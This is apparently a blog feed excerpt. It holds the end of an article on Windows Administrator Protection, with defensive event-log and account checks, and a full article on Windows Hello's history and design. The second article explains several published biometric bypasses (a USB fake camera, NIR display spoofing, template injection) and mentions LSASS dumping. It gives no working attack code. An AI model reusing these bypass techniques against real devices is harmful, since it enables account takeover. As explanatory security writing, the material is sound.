:: Process the .etl with PerfView, Message Analyzer, or:
wevtutil qe Microsoft-Windows-LUA/Operational /q:"*[System[(EventID=15031 or EventID=15032)]]" /f:text

Verify the SMAA presence after enablement:

Get-LocalUser | Where-Object Name -like 'ADMIN_*'
# After an elevation, run from the elevated console:
whoami
# Expect: WIN11-PC\ADMIN_<random16hex>

Note: The single most common mistake in response to an Administrator Protection compatibility problem is to disable UAC globally by setting EnableLUA = 0. This returns the device to the Windows XP single-token model, removes Mandatory Integrity Control enforcement on application processes, and effectively defeats every layer of UAC and Administrator Protection together. It is universally discouraged. The correct fix is per-application, via manifest, or per-device, via the documented Administrator Protection compatibility list.

Six tips, one boundary, one operational checklist. The next section answers the most common misconceptions.

17. Frequently asked questions

No. Administrator Protection runs in `appinfo.dll` inside the Application Information service, which runs in `svchost.exe` in VTL0 (the normal Windows kernel context). The SMAA itself is a normal SAM-database account, not a Virtual Secure Mode trustlet. The cross-process protections of Virtualization-Based Security apply to LSASS Credential Guard and a handful of other VTL1 services; the elevation pipeline is not one of them. The Secure Kernel article in this series treats VTL0 / VTL1 separation in detail. Partially. Administrator Protection replaces Admin Approval Mode UAC when `TypeOfAdminApprovalMode = 2`. The credential-prompt path (the over-the-shoulder elevation that asks a standard user to enter an administrator's credentials) and classic Admin Approval Mode (`TypeOfAdminApprovalMode = 1`) coexist with Administrator Protection across different configurations [@ms-admin-protection]. On a device with Administrator Protection enabled, only the interactive admin's elevation path goes through the SMAA; the standard-user-asking-for-admin-credentials path is unchanged. No. There is absolutely an admin token; it lives in a different account, in a different logon session, for a bounded lifetime. The marketing language describes lifetime and isolation, not nonexistence [@ms-developer-blog-2025, @bleepingcomputer-2024]. The SMAA's token persists for the lifetime of the elevated process; when the process exits, the token handle is released and the logon session is reaped. Between elevations, no SMAA token exists in memory. No. Malware can still elevate if the user accepts the Hello prompt. The boundary Administrator Protection creates is between *silent* elevation and *consented* elevation, not between any elevation and none. Microsoft's design position is explicit: "I expect that malware will still be able to get administrator privileges even if that's just by forcing a user to accept the elevation prompt" [@forshaw-pz-jan2026]. The three sub-cases of consent-without-identity-verification from §9 are cost-raised, not eliminated. What changes is that the elevation must be visible. Defenders gain the ETW 15031 audit trail as a result. No. EPM uses a virtual elevated account on a per-request basis with cloud-side policy, and the virtual account is *not* a member of the local Administrators group [@ms-epm-overview]. Administrator Protection uses a persistent local SMAA per admin user, with on-box `appinfo.dll` policy, and the SMAA *is* a member of the local Administrators group [@call4cloud-osint]. EPM is centrally policy-driven and works on standard-user devices; Administrator Protection is per-device architecture and applies only to interactive admin users. The two can coexist on the same device. No. Per Microsoft Learn, remote logon, roaming profiles, and backup admins are out of scope [@ms-admin-protection]. A domain administrator who logs into a workstation interactively will not see the SMAA path. Microsoft has stated that domain scenarios may be added in future iterations; the current GA-target form is local-machine-only, interactive-admin-only. No. Mimikatz inside the elevated SMAA session still has `SeDebugPrivilege` and can call `OpenProcess` on `lsass.exe` to dump LSASS unless LSA Protection (Run As Protected Process Light) and Credential Guard are also enabled. Administrator Protection protects the *elevation path*; it does not protect the *resulting privileged session*. To protect the privileged session, pair Administrator Protection with LSA Protection (`RunAsPPL=1`), Credential Guard, App Control for Business, and HVCI. The Secure Kernel article in this series covers the LSA Protection mechanism.

The misconceptions are cleared. The next section returns to the opening hook with the new vocabulary the article has built.

18. The user-elevation companion to Credential Guard

Return to the two whoami /all outputs from §1, this time with the vocabulary the article has built.

The first output shows the primary user under classic UAC. One SID, one profile, one HKCU, one logon-session LUID; the elevated console is the same user as the unelevated console, distinguished only by the integrity level on the token.

The second output shows the same login under Administrator Protection. A different user name -- ADMIN_<random> -- with a different SID linked to the primary admin via ShadowAccountForwardLinkSid and ShadowAccountBackLinkSid. A different profile under C:\Users\ADMIN_<random>\. A different NTUSER.DAT mapped as HKCU. A fresh authentication-ID LUID minted by LSASS through the credential-less logon path described in §7, on the strength of appinfo.dll's trusted request and a Hello gesture the primary user just performed. An ETW Event 15031 in the Microsoft-Windows-LUA provider, freshly emitted, recording the elevation as approved, the application path, and the authentication method.

The thesis lands. The elevation path is now itself a security boundary, with bulletin-grade fixes when it fails. Administrator Protection is the user-elevation companion to Credential Guard. Where Credential Guard isolated LSA secrets from admin-equals-kernel inside the machine -- the Secure Kernel article in this series covers the VBS-rooted isolation in detail -- Administrator Protection isolates the elevation path from the standard-user session. The two answer the two halves of the question the foundational Access Control article in this series left open: if admin equals kernel and tokens are bearer credentials, what is left to harden? The answer is the path that gets you there (Administrator Protection) and the data that is there once you arrive (Credential Guard).

The December 2025 revert is the first iteration's learning round. The architecture is the right one. The application base catches up next. Forshaw's framing in February 2026 -- that Microsoft might have shipped this as a configurable mode rather than replacing admin approval completely -- is a reasonable critique, and the re-enablement is likely to address it. Until then, the operational reality on most stable Windows devices is the classic split-token model, with all the bypass canon it implies, and the SMAA design remains an Insider-Preview-and-policy-opted-in posture.

What stays unchanged is the structural insight. The mechanism Microsoft used to make the elevation path a boundary is not novel; multi-user accounts have shipped in Windows NT since 1993. What changed is the classification. Microsoft accepted, after twenty years of evidence, that the elevation pipeline needed to be a security boundary, and accepted with it the engineering cost: separate accounts, separate profiles, separate logon sessions, removal of auto-elevation, a credential gate instead of a click-through, an audit-trail ETW provider, and a willingness to ship bulletin-grade fixes for every Forshaw finding. The classification was the engineering decision. Everything else followed.

This is what it took, in mechanism and in time, to make the elevation path real [@forshaw-pz-jan2026].

No Secrets to Steal: How Windows Hello Eliminated the Shared Secret

noreply@paragmali.com (Parag Mali) — Tue, 28 Apr 2026 00:00:00 GMT

**Windows Hello replaces passwords with biometric authentication backed by hardware cryptography.** Your face or fingerprint unlocks a private key sealed inside a TPM chip -- no biometric data ever leaves your device, and no shared secret crosses the network. After a decade of enterprise growing pains and a cat-and-mouse security arms race, Microsoft made passwordless the default for new accounts in May 2025, with passkeys now achieving a 98% sign-in success rate. The password's 64-year reign is ending -- but open problems in biometric spoofing, credential portability, and quantum-resistant cryptography mean the replacement is still under construction.

Why Passwords Must Die

In 2024, Microsoft observed 7,000 password attacks every second [@ms-passkeys] -- more than double the rate from 2023. Picture this: a user types their carefully memorized 16-character password into what looks like a corporate login page. The page is a phishing replica. In under a second, that password -- the one they have been rotating every 90 days for three years -- belongs to someone else.

Microsoft observed 7,000 password attacks per second in 2024. The password Corbato invented as a quick fix in 1961 had become the single greatest attack surface in computing.

The problem is not weak passwords. The problem is passwords themselves. They are shared secrets -- a piece of information that both you and the server know. Anything a server stores can be stolen. Anything you type can be intercepted. Anything you memorize can be phished. These are not implementation bugs. They are design properties.

It was not supposed to be this way. In 1961, Fernando Corbato [@wiki-password] introduced computer passwords at MIT as a quick fix for multi-user mainframes. Users needed separate file spaces on the Compatible Time-Sharing System (CTSS), and a secret string was the simplest way to provide per-user isolation. It was a temporary measure for a specific engineering constraint.

That temporary measure lasted 64 years.

What if authentication did not require a secret at all? What if your face unlocked a cryptographic key -- and that key never left your device? That is the promise of Windows Hello. But the story of how we got here passes through a gelatin finger, a low-cost USB device, and a near-infrared camera that shattered assumptions about what "secure" really means.

The Password's 64-Year Reign: A Brief History of Authentication Failure

In 1966, a software bug in MIT's CTSS printed the master password file to every user's terminal -- the first known password breach [@wiki-password].The 1966 CTSS incident was not a hack. A system administrator accidentally swapped the login message file with the master password file. Every user who logged in that day saw everyone else's password on screen.

It was a sign of things to come. For the next six decades, every generation of authentication would solve one problem -- and reveal a deeper one.

gantt title Authentication Evolution dateFormat YYYY axisFormat %Y section Passwords Plaintext passwords on CTSS :1961, 1979 section Hashed UNIX crypt / hashed passwords :1979, 1993 section Network Auth NTLM challenge-response :1993, 2000 Kerberos / Windows AD :2000, 2015 section Biometrics Software biometrics via WBF :2009, 2015 section Windows Hello Hello + TPM asymmetric auth :2015, 2021 ESS + VBS + Cloud Trust :2021, 2024 Passkeys and passwordless default :2024, 2026

Generation 0: Plaintext passwords (1961)

Corbato's CTSS stored passwords in plaintext [@wiki-password] in a file accessible to administrators. The model was simple: the user enters a string, the system compares it to a stored copy, and access is granted on match. The key assumption -- that only the legitimate user knows the password -- held exactly as long as the system remained uncompromised. Which was about five years.

Generation 1: Hashed passwords (1970s)

The obvious fix: do not store passwords in plaintext. In 1979, Robert Morris and Ken Thompson published the design behind UNIX's crypt() function [@wiki-crypt], a one-way hash based on a modified DES algorithm with a 12-bit salt. Even if an attacker stole the hash file, they could not directly read the passwords. They would have to try every possible password and compare hashes -- a brute-force attack.

For a while, that was computationally infeasible. Then Moore's Law caught up. By the late 1990s, EFF's DES Cracker and distributed.net had reduced 56-bit DES keysearch to 22 hours and 15 minutes [@eff-des], making DES-based crypt() increasingly untenable against well-funded attackers. Users also chose weak, predictable passwords, and attackers built rainbow tables that mapped common passwords to their hashes instantly.

Windows made this worse. LAN Manager (LM) hashes [@ms-lm-hash] uppercased every password, limited them to 14 characters, and split them into two 7-byte halves hashed independently.The LM hash design was spectacularly bad. By splitting a 14-character password into two 7-character halves, it reduced the brute-force search space from 95^14 to 2 x 95^7 -- a reduction of over 34 trillion times. An attacker could crack each half separately.

Rainbow tables could crack LM hashes in seconds. Microsoft eventually disabled LM hashing by default in Windows Vista, but the damage to enterprise networks had been done.

Generation 2: Network challenge-response (1990s)

The next insight: stop transmitting passwords over the network. NTLM [@ms-lm-hash] used a challenge-response protocol -- the server sends a random nonce, the client computes a response using the nonce and the password hash, and the server verifies the response. The password never crosses the wire.

Kerberos [@ms-kerberos], adopted in Windows 2000, improved further with mutual authentication, time-limited tickets, and single sign-on. It was elegant protocol engineering.

But the fundamental problem remained: shared secrets. NTLM was vulnerable to pass-the-hash attacks [@mitre-pth] -- an attacker who obtains the password hash can authenticate without ever knowing the password. Kerberos tickets could be stolen (Golden Ticket, Silver Ticket attacks). Both systems still depended on users choosing strong passwords, which they consistently failed to do.

Generation 3: First software biometrics (2000s)

By the early 2000s, fingerprint readers appeared on Windows laptops. The idea was appealing: replace "something you know" with "something you are." No password to remember, no password to steal.

Microsoft introduced the Windows Biometric Framework (WBF) [@ms-wbf] in Windows 7 (2009), standardizing the API and driver interface. Before WBF, each fingerprint reader vendor -- AuthenTec, Validity, UPEK -- shipped proprietary middleware that injected into the Windows logon process. The result was inconsistent security, driver conflicts, and no centralized management.

But WBF solved the wrong problem. It standardized the API while leaving the security model unchanged: biometric templates stored with weak encryption in user-accessible files, matching running in OS user space, and no hardware isolation whatsoever.

In 2002, Tsutomu Matsumoto at Yokohama National University demonstrated the "gummy finger" attack -- creating gelatin replicas of fingerprints that fooled approximately 80% of commercial readers [@gummy-finger]. The materials cost just a few dollars. Without liveness detection and hardware protection, biometrics were security theater.

The pattern was unmistakable. Each generation protected a different layer -- plaintext storage, hash computation, network transmission, biometric convenience -- but each left the next layer exposed. By 2013, passwords were fundamentally broken, and software-only biometrics were not the answer. Then Apple proved something nobody expected.

The Catalyst: How Touch ID Changed Everything

September 2013. Apple unveils the iPhone 5S [@apple-touchid] with a fingerprint sensor embedded in the home button. It was not the first phone with a fingerprint reader -- Motorola's ATRIX 4G shipped with a biometric fingerprint reader in 2011 [@motorola-atrix]. But it was the first one that hundreds of millions of people actually used.

What made Touch ID different was not the sensor. It was the Secure Enclave -- a dedicated secure subsystem integrated into Apple's system-on-chip and isolated from the main processor [@apple-secure-enclave]. The enclave runs its own microkernel, stores biometric material in protected memory, and keeps the matching pipeline outside the reach of normal iOS processes. Apple designed it so the biometric path stayed inside the enclave boundary rather than becoming just another app-visible API.

Note: Apple controlled the sensor, the SoC, the Secure Enclave hardware, and iOS. This vertical integration meant the entire biometric pipeline -- from sensor capture through template matching to key release -- could be designed as a single trust chain. No Windows OEM could match this in 2013 because the sensor, CPU, and OS came from three different vendors with no unified security model.

That architecture established a pattern that Windows Hello would later follow with the TPM. Both isolate secrets in hardware, but they do different jobs: the Secure Enclave is a richer coprocessor that protects both biometric processing and keys, while the TPM is a narrower trust anchor for key storage, signing, and attestation. Apple's newer Secure Enclave documentation also emphasizes encrypted enclave memory, whereas Windows later needed ESS and VBS to give its broader PC system a comparable isolation boundary [@apple-secure-enclave; @ms-ess].

Touch ID proved two things simultaneously: that consumer biometrics could be both secure and delightful, and that the key to secure biometrics was hardware isolation, not better algorithms.

The FIDO Alliance had already been working on the standards side. Founded in July 2012 [@fido-launch] by Michael Barrett (PayPal's CISO), Ramesh Kesanupalli (Nok Nok Labs), and partners including Lenovo, Validity Sensors, and Infineon, the Alliance set out to create open standards for strong authentication that would replace passwords. Its first protocols split the problem in two: UAF defined a passwordless flow where a device-local biometric or PIN unlocks a per-service key pair [@fido-uaf], while U2F defined a hardware-token second factor that signs a challenge after the user taps the device [@fido-u2f]. FIDO2 later unified these ideas into the WebAuthn + CTAP stack used for passkeys today [@fido-how].

The convergence was forming: consumer demand (Apple proved people wanted biometrics), open standards (FIDO defined how it should work), and enterprise need (Microsoft tracked thousands of password attacks per second). Apple showed what was possible. The FIDO Alliance defined how it should work. Microsoft was about to show how to do it at the scale of an entire operating system.

The Breakthrough: Windows Hello's Architecture

On March 17, 2015, Joe Belfiore announced Windows Hello. The key insight was not an algorithm -- it was an architecture. What if the biometric never leaves the device, and the authentication secret is a cryptographic key that even the server never sees?

A dedicated security chip soldered to a computer's motherboard (or implemented in firmware) that generates, stores, and manages cryptographic keys. The TPM can create key pairs where the private key is physically bound to the chip and cannot be exported -- even the operating system cannot extract it. Windows Hello uses TPM 2.0 to seal authentication keys. A cryptographic system using two mathematically related keys: a public key (shared openly) and a private key (kept secret). Data encrypted with one key can only be decrypted with the other. In Windows Hello, the TPM holds the private key and signs authentication challenges; the server holds only the public key, which is useless to an attacker.

Here is how Windows Hello authentication [@ms-whfb] works:

sequenceDiagram participant U as User participant B as Biometric Sensor participant D as Device OS participant T as TPM Chip participant S as Identity Server U->>B: Present face or fingerprint B->>D: Capture biometric sample D->>D: Match against stored template Note over D: Local verification only D->>T: Request private key release T->>T: Verify TPM-bound policy T-->>D: Private key available for signing S->>D: Send challenge nonce D->>D: Sign nonce with private key D->>S: Return signed assertion S->>S: Verify signature with public key S->>D: Authentication success

Step 1: Enrollment. The TPM generates an asymmetric key pair -- RSA-2048 or ECDSA P-256. The private key is sealed inside the TPM and cannot be exported. The public key is registered with the identity provider (Azure AD, Entra ID, or on-premises AD) [@ms-whfb].

Step 2: Biometric enrollment. The user registers their face (via a near-infrared camera) or fingerprint. The biometric template is stored locally on the device, protected by the OS.

Step 3: Authentication. The user presents their biometric gesture. The device verifies it locally against the stored template. If the match succeeds, the TPM releases the private key. The identity server sends a random challenge nonce; the device signs it with the private key and returns the signed assertion. The server verifies the signature using the stored public key. No shared secret ever crosses the network.

Key idea: Windows Hello's breakthrough was architectural, not algorithmic. By pairing biometrics with hardware-backed asymmetric cryptography, it eliminated shared secrets entirely. No biometric data ever leaves the device. No password hash sits on a server waiting to be stolen. Each authentication is a fresh, unreplayable cryptographic signature.

The probability that a biometric system incorrectly accepts an unauthorized person. Windows Hello requires a facial recognition FAR below 0.001% (1 in 100,000) [@ms-biometric-reqs]. Apple's Face ID is documented at less than 0.0001% (1 in 1,000,000) for a single enrolled face [@apple-faceid-security]. Lower is better -- but zero is theoretically impossible. A camera technology that captures light in the 700--1000 nanometer wavelength range, invisible to the human eye. Windows Hello uses NIR cameras because infrared illumination works regardless of ambient lighting and is harder to spoof with printed photos or screens -- standard displays do not emit near-infrared light. Or so everyone assumed until 2025.

Note: Without a TPM, Windows Hello falls back to software key storage, dramatically weakening the security model. The private key becomes a file protected by the OS rather than a secret sealed in tamper-resistant silicon. Always verify TPM 2.0 is present and active before relying on Hello's security properties.

A Trusted Platform Module is not a general-purpose processor. It is a purpose-built chip (or firmware module) designed for a narrow set of cryptographic operations: key generation, key storage, signing, and attestation.

When Windows Hello enrolls a user, the TPM generates a key pair using its internal random number generator. The private key never exists outside the chip's boundary -- it is generated inside the TPM and stays there. The TPM enforces access policies: it will only release the key for signing after the device OS confirms that the biometric match succeeded. Even a compromised operating system kernel cannot extract the private key from a hardware TPM.

This is fundamentally different from software key storage, where the key is a file on disk that any sufficiently privileged process can read.

The PIN paradox

Windows Hello also revived the humble PIN -- and made it more secure than a complex password. A Hello PIN [@ms-whfb] is device-bound: it unlocks the TPM-stored private key on that specific device. A stolen PIN is useless without physical access to the hardware. Compare this to a password, which works from any device on earth. A 4-digit PIN on Windows Hello is architecturally more secure than a 20-character password reused across services.Microsoft Passport was briefly announced as a separate product in early 2015 -- the cryptographic key infrastructure behind Windows Hello. By late 2015, the branding was merged. "Microsoft Passport" was retired and its functionality absorbed into "Windows Hello" and "Windows Hello for Business." The separate brand caused market confusion and was quickly abandoned.

The biometric FAR can be expressed mathematically. For a face recognition system with $n$ enrolled users and a per-comparison FAR of $p$, the probability of at least one false acceptance across all comparisons is:

$$P(\text{false accept}) = 1 - (1 - p)^n$$

For Windows Hello's required FAR of $10^{-5}$ [@ms-biometric-reqs] and a single user, this gives a 0.001% chance per authentication attempt. With 1,000 attempts, the cumulative probability rises to roughly 1% -- which is why lockout policies and anti-hammering protections exist.

{` // This demonstrates the core idea behind Windows Hello's authentication. // In the real system, the private key lives in the TPM and never leaves.

async function simulateHelloAuth() { // Step 1: Enrollment -- generate key pair (TPM does this in hardware) const keyPair = await crypto.subtle.generateKey( { name: "ECDSA", namedCurve: "P-256" }, true, // extractable for demo only; TPM keys are NOT extractable ["sign", "verify"] ); console.log("Key pair generated (simulating TPM enrollment)");

// Step 2: Server sends a challenge nonce const challenge = crypto.getRandomValues(new Uint8Array(32)); console.log("Server challenge:", Array.from(challenge.slice(0, 8)).map(b => b.toString(16).padStart(2, '0')).join(''));

// Step 3: Device signs the challenge with the private key const signature = await crypto.subtle.sign( { name: "ECDSA", hash: "SHA-256" }, keyPair.privateKey, challenge ); console.log("Signed assertion:", new Uint8Array(signature).slice(0, 16).join(',') + '...');

// Step 4: Server verifies with the public key const valid = await crypto.subtle.verify( { name: "ECDSA", hash: "SHA-256" }, keyPair.publicKey, signature, challenge ); console.log("Server verification:", valid ? "SUCCESS" : "FAILED"); console.log("\nNote: The private key never left the device."); console.log("The server only has the public key -- useless to an attacker."); }

simulateHelloAuth(); `}

Windows Hello solved the fundamental password problem: no shared secrets ever traverse the network. But the story does not end here -- because researchers would soon discover that protecting the key was not enough if you could not trust the camera.

The Enterprise Gambit: Windows Hello for Business

Windows Hello delighted consumers. But enterprise IT administrators asked a harder question: how do I deploy this to 50,000 machines managed by Active Directory?

The W3C Web Authentication API -- a browser standard that lets websites request public-key-based authentication from platform authenticators (like Windows Hello) or roaming authenticators (like security keys). WebAuthn became a W3C Recommendation on March 4, 2019, forming the browser-side component of the FIDO2 standard alongside CTAP (Client-to-Authenticator Protocol).

Windows Hello for Business (WHfB) [@ms-whfb] launched in 2016 with two trust types, each carrying its own infrastructure burden:

Certificate Trust required a full Public Key Infrastructure -- a Certificate Authority hierarchy, CRL distribution points, certificate templates, and ADFS (Active Directory Federation Services). For organizations that already had PKI, this was a natural fit. For everyone else, it meant weeks of setup.

Key Trust required Windows Server 2016+ domain controllers with AD schema extensions. Simpler than Certificate Trust, but still demanded on-premises infrastructure that many cloud-first organizations were trying to eliminate.Yogesh Mehta, Principal Group Program Manager at Microsoft, evangelized Windows Hello for Business at Ignite 2016. He would later be credited as a key figure in the FIDO2 certification effort. The original Belfiore blog post URL announcing Windows Hello is now lost to link rot.

Two milestones accelerated adoption. In March 2019, WebAuthn became a W3C Recommendation [@w3c-webauthn] -- a universal browser API for public-key authentication. Android had already been FIDO2-certified in February 2019 [@fido-android-certification]; two months after WebAuthn's recommendation, Windows Hello became one of the first FIDO2-certified platform authenticators built into a desktop operating system [@fido-certification]. Together, these meant that Windows Hello could authenticate not just to Windows, but to any FIDO2-supporting website through any modern browser.

Note: Unless you have specific PKI requirements, Cloud Trust -- announced by Microsoft in 2022 [@ms-cloud-trust-ga] -- eliminates much of the complexity of certificate and key trust deployments. It requires Entra ID configuration and Microsoft Entra Kerberos rather than a full on-prem PKI or ADFS stack, which is why Microsoft now treats it as the default recommendation for many hybrid organizations.

flowchart TD A[Choose a WHfB Trust Model] --> B{Cloud-native org using Entra ID?} B -->|Yes| C[Cloud Trust -- Recommended] B -->|No| D{On-prem AD still required?} D -->|Yes| E{Existing PKI infrastructure?} D -->|No| C E -->|Yes| F[Certificate Trust] E -->|No| G[Key Trust] C --> H[Simplest deployment: Entra ID only] F --> I[Most complex: CA + CRL + ADFS] G --> J[Moderate: Server 2016+ DCs required]

Cloud Trust delegates all validation to Entra ID. No on-premises PKI, no ADFS, no certificate templates. Best for organizations that are cloud-native or hybrid with Azure AD.

Key Trust requires Windows Server 2016+ domain controllers with AD schema extensions. Choose this if you need on-premises AD support but do not have PKI.

Certificate Trust requires the full PKI stack -- CA hierarchy, CRL distribution, ADFS. Choose this only if your organization already has PKI infrastructure and needs certificate-based authentication for regulatory compliance.

Enterprise deployment was painful -- multiple trust models confused administrators, and adoption was slower than hoped. But it was about to get much worse. In July 2021, a researcher with a low-cost USB board would demonstrate that Windows Hello's most basic assumption was wrong.

The Security Arms Race: When Researchers Fought Back

Omer Tsarfati had a simple question: what happens if you plug in a USB device that claims to be an IR camera? The answer would force Microsoft to rethink Windows Hello's entire trust model.

The USB camera bypass (CVE-2021-34466)

In July 2021, Tsarfati at CyberArk Labs [@cyberark-bypass] revealed that Windows Hello's facial recognition accepted input from any USB device presenting itself as an IR camera -- with no attestation, no hardware trust verification, and no device identity check.Tsarfati's attack required only a single IR frame -- not video, not a 3D reconstruction, just one static infrared image of the target's face. The simplicity of the attack was what made it so alarming.

Using an NXP evaluation board [@cyberark-bypass], Tsarfati constructed a custom USB device that replayed a single IR frame of a target's face. Plug it in, and Windows Hello authenticated the attacker as the target. At the time, 85% of Windows 10 users employed Windows Hello [@cyberark-bypass] -- making this a massive attack surface.

The insight was devastating: the TPM protected the key, but nobody protected the camera. Windows Hello's threat model assumed trusted camera hardware. The USB specification makes no such guarantee.

A Windows feature that uses the hardware hypervisor to create an isolated virtual environment (Virtual Trust Level 1, or VTL1) separated from the main OS kernel (VTL0). Even if an attacker gains SYSTEM-level access to the Windows kernel, they cannot read memory in VTL1. Windows Hello's Enhanced Sign-in Security uses VBS to isolate biometric processing.

Microsoft's response: ESS and VBS

Microsoft's answer came with Windows 11: Enhanced Sign-in Security (ESS) [@ms-ess], which moved biometric matching into the VBS-protected enclave described above. Even a compromised Windows kernel cannot access templates or tamper with the comparison pipeline there.

flowchart TD subgraph VTL0["VTL0: Normal OS Environment"] A[Windows Kernel] B[Applications] C[Standard Drivers] end subgraph VTL1["VTL1: Secure World -- ESS"] D[Biometric Matching Engine] E[Encrypted Template Storage] F[Credential Isolation] end G[Hypervisor] --- VTL0 G --- VTL1 H[Secure Biometric Sensor] --> D A -.->|Blocked by Hypervisor| D B -.->|Blocked by Hypervisor| E

Alongside ESS, Microsoft rolled out Cloud Trust in 2022 [@ms-cloud-trust-ga], eliminating the need for on-premises PKI for many deployments. Two problems -- biometric isolation and deployment complexity -- were finally being addressed in parallel.

Red Bleed: the NIR assumption shatters (CVE-2025-26644)

The arms race was not over. In August 2025, researchers Bowen Hu, Kuo Wang, and Chip Hong Chang at Nanyang Technological University presented "Red Bleed" [@red-bleed] at USENIX Security 2025. Microsoft had already patched CVE-2025-26644 [@wiz-cve] in April 2025, but the full attack was now public.

Windows Hello's NIR facial recognition relied on a critical assumption: no commercial display can emit near-infrared light. The researchers shattered this assumption [@nvd-red-bleed] with a custom-built LCD screen costing less than $400 that could display NIR images. They trained a Variational Autoencoder to convert widely available RGB photos -- from social media, video calls, public sources -- into convincing NIR facial videos. The result: a presentation attack that bypassed Windows Hello face authentication and prompted liveness-detection hardening [@red-bleed-pdf]. The Red Bleed attack name references the "red bleed" phenomenon in LCD panels where a small amount of near-infrared light leaks through the color filters -- the researchers amplified this effect with a custom panel.

Microsoft's April 2025 patch strengthened liveness detection and anti-spoofing measures for NIR authentication.

Faceplant: the template swap (CVE-2026-20804)

The third major attack came from ERNW Research in August 2025. At Black Hat USA 2025, Baptiste David and Tillmann Oßwald's official conference briefing "Windows Hell No for Business" [@blackhat-windows-hell-no] detailed the Faceplant template-injection attack, which they later documented technically on ERNW's research blog [@faceplant].

In practice, an attacker with local administrator privileges could enroll their own face on one machine, extract the resulting template, and transplant it into the victim's biometric database on the target device. After injection, Windows Hello accepted the attacker's face for the victim's account. ERNW traced the weakness to software-protected templates that a local administrator could extract and replace on non-ESS systems [@faceplant].

ESS blocks this attack completely -- biometric templates in VTL1 are inaccessible even to local administrators. But many enterprise PCs lack ESS-compatible hardware.

Note: Many enterprise PCs -- particularly those shipped without an ESS-certified built-in biometric sensor, including many AMD-based and older Intel-based machines -- lack ESS capability. On these machines, biometric templates remain in software-protected storage vulnerable to the Faceplant attack. Verify hardware compatibility before assuming biometric isolation is active.

flowchart TD A["2015: Windows Hello Launch"] --> B["2021: CVE-2021-34466\nUSB Camera Spoofing"] B --> C["Microsoft Response:\nESS + VBS Isolation"] C --> D["2025: CVE-2025-26644\nRed Bleed NIR Attack"] D --> E["Microsoft Response:\nLiveness Detection Update"] E --> F["2025: CVE-2026-20804\nFaceplant Template Injection"] F --> G["Defense: ESS Hardware\nIsolation Blocks Attack"] G --> H["Ongoing: Adversarial ML\nArms Race"] classDef fake fill:#7a3030,stroke:#c44b4b,color:#fce8e8 class B fake,stroke:#333 class D fake,stroke:#333 class F fake,stroke:#333 classDef real fill:#2f5a3a,stroke:#5fa872,color:#dff5e4 class C real,stroke:#333 class E real,stroke:#333 class G real,stroke:#333

Key idea: Each generation of authentication protected a new layer -- but every layer revealed the next attack surface. The TPM protected the key. ESS protected the biometric pipeline. Liveness detection hardened NIR authentication. Security is never a single solution. It is a stack, and each layer needs its own defense.

The arms race revealed a humbling truth: biometric authentication is not a silver bullet. It is a layered defense -- and each layer needs its own protection. But while researchers probed Windows Hello's defenses, the industry was converging on something bigger.

The Convergence: Passkeys and the Passwordless Future

May 5, 2022. Apple, Google, and Microsoft [@passkeys-announcement] -- three companies that agree on almost nothing -- issued a joint announcement: they were all committing to passkeys.

A FIDO2/WebAuthn credential built on the same public-key model as Windows Hello. Passkeys can be device-bound (like traditional Hello credentials, stored in the TPM) or synced across devices through a credential manager such as iCloud Keychain or Google Password Manager. The local biometric or PIN check stays on-device; the relying party only sees public keys and signatures.

FIDO2 had a usability problem. Credentials were bound to a single device. Lose your laptop, lose your credentials. Passkeys solved this by introducing synced credentials -- private keys encrypted and distributed across a user's devices through their platform credential manager. The FIDO Alliance's protocol [@fido-how] maintained the cryptographic guarantees (no shared secrets, phishing resistance) while adding the portability users demanded."World Password Day" was symbolically renamed "World Passkey Day" in May 2025, when Microsoft announced that new accounts would default to passwordless authentication.

The numbers tell the story

By May 2025, Microsoft made new accounts passwordless by default [@ms-passkeys]:

Nearly 1 million passkey registrations daily [@ms-passkeys]
98% passkey sign-in success rate [@ms-passkeys] vs. 32% for passwords
Passkey sign-ins 8x faster [@ms-passkeys] than password + MFA

How the platforms compare

Dimension	Windows Hello (WHfB)	Apple Face ID / Passkeys	Google Passkeys	FIDO2 Hardware Keys
Hardware root of trust	TPM 2.0	Secure Enclave	TEE / Titan M	On-key secure element
Credential sync	No (device-bound)	Yes (iCloud Keychain)	Yes (Google PM)	No (hardware-bound)
Cross-platform	Windows only	Apple + QR/BT bridge	Android/Chrome + QR/BT	Universal USB/NFC/BT
FAR (face)	< 0.001%	< 0.0001%	Varies by OEM	N/A
Enterprise management	Intune, GP, Conditional Access	Limited (Apple MDM)	Android Enterprise	Manual provisioning
Recovery on device loss	Re-enroll on new device	iCloud backup restore	Google Account restore	Requires backup key
NIST AAL level	AAL2	AAL2	AAL2	AAL3-eligible
Best suited for	Windows enterprise	Apple platform	Android / cross-platform web	High-assurance regulated

Sources: Microsoft biometric requirements [@ms-biometric-reqs], Apple passkey security [@apple-passkeys-security], Google passkeys [@google-passkeys], FIDO specifications [@fido-specs]

Google's passkey story is centered on Google Password Manager: passkeys created on Android or Chrome sync across Android, ChromeOS, Windows, macOS, Linux, and Chrome browsers where the same account is available [@google-passkeys]. FIDO2 hardware security keys (YubiKey, Google Titan) take the opposite approach: the credential stays on a dedicated secure element, works across platforms via USB/NFC/Bluetooth, and must be provisioned deliberately on each account [@fido-u2f; @fido-how]. That trade-off buys the highest assurance available today; multi-factor cryptographic hardware authenticators are the mainstream route to NIST AAL3 [@nist-aal].

sequenceDiagram participant U as User participant B as Browser participant A as Platform Authenticator participant S as Relying Party Server U->>B: Click Register with Passkey B->>S: Request registration options S->>B: Return challenge + relying party info B->>A: navigator.credentials.create() A->>U: Prompt biometric verification U->>A: Present face / fingerprint / PIN A->>A: Generate key pair in TPM A->>B: Return public key + attestation B->>S: Send credential to server S->>S: Store public key for user S->>B: Registration complete

{` // This shows the structure of a WebAuthn registration request. // In production, the challenge comes from your server.

const registrationOptions = { publicKey: { // Random challenge from the server (32 bytes) challenge: crypto.getRandomValues(new Uint8Array(32)),

// Your service identity
rp: {
  name: "Example Corp",
  id: "example.com"
},

// User identity
user: {
  id: new Uint8Array([1, 2, 3, 4]),
  name: "alice@example.com",
  displayName: "Alice"
},

// Acceptable key types (ES256 = ECDSA P-256)
pubKeyCredParams: [
  { type: "public-key", alg: -7 }  // ES256
],

// Request a resident/discoverable credential (passkey)
authenticatorSelection: {
  residentKey: "required",
  userVerification: "required"  // Biometric or PIN
},

// 5-minute timeout
timeout: 300000

} };

console.log("Registration options structure:"); console.log(JSON.stringify(registrationOptions.publicKey.rp, null, 2)); console.log("\nKey algorithm: ES256 (ECDSA P-256)"); console.log("Resident key: required (discoverable passkey)"); console.log("User verification: required (biometric or PIN)"); console.log("\nIn production, call: navigator.credentials.create(registrationOptions)"); `}

Deploying Windows Hello Today

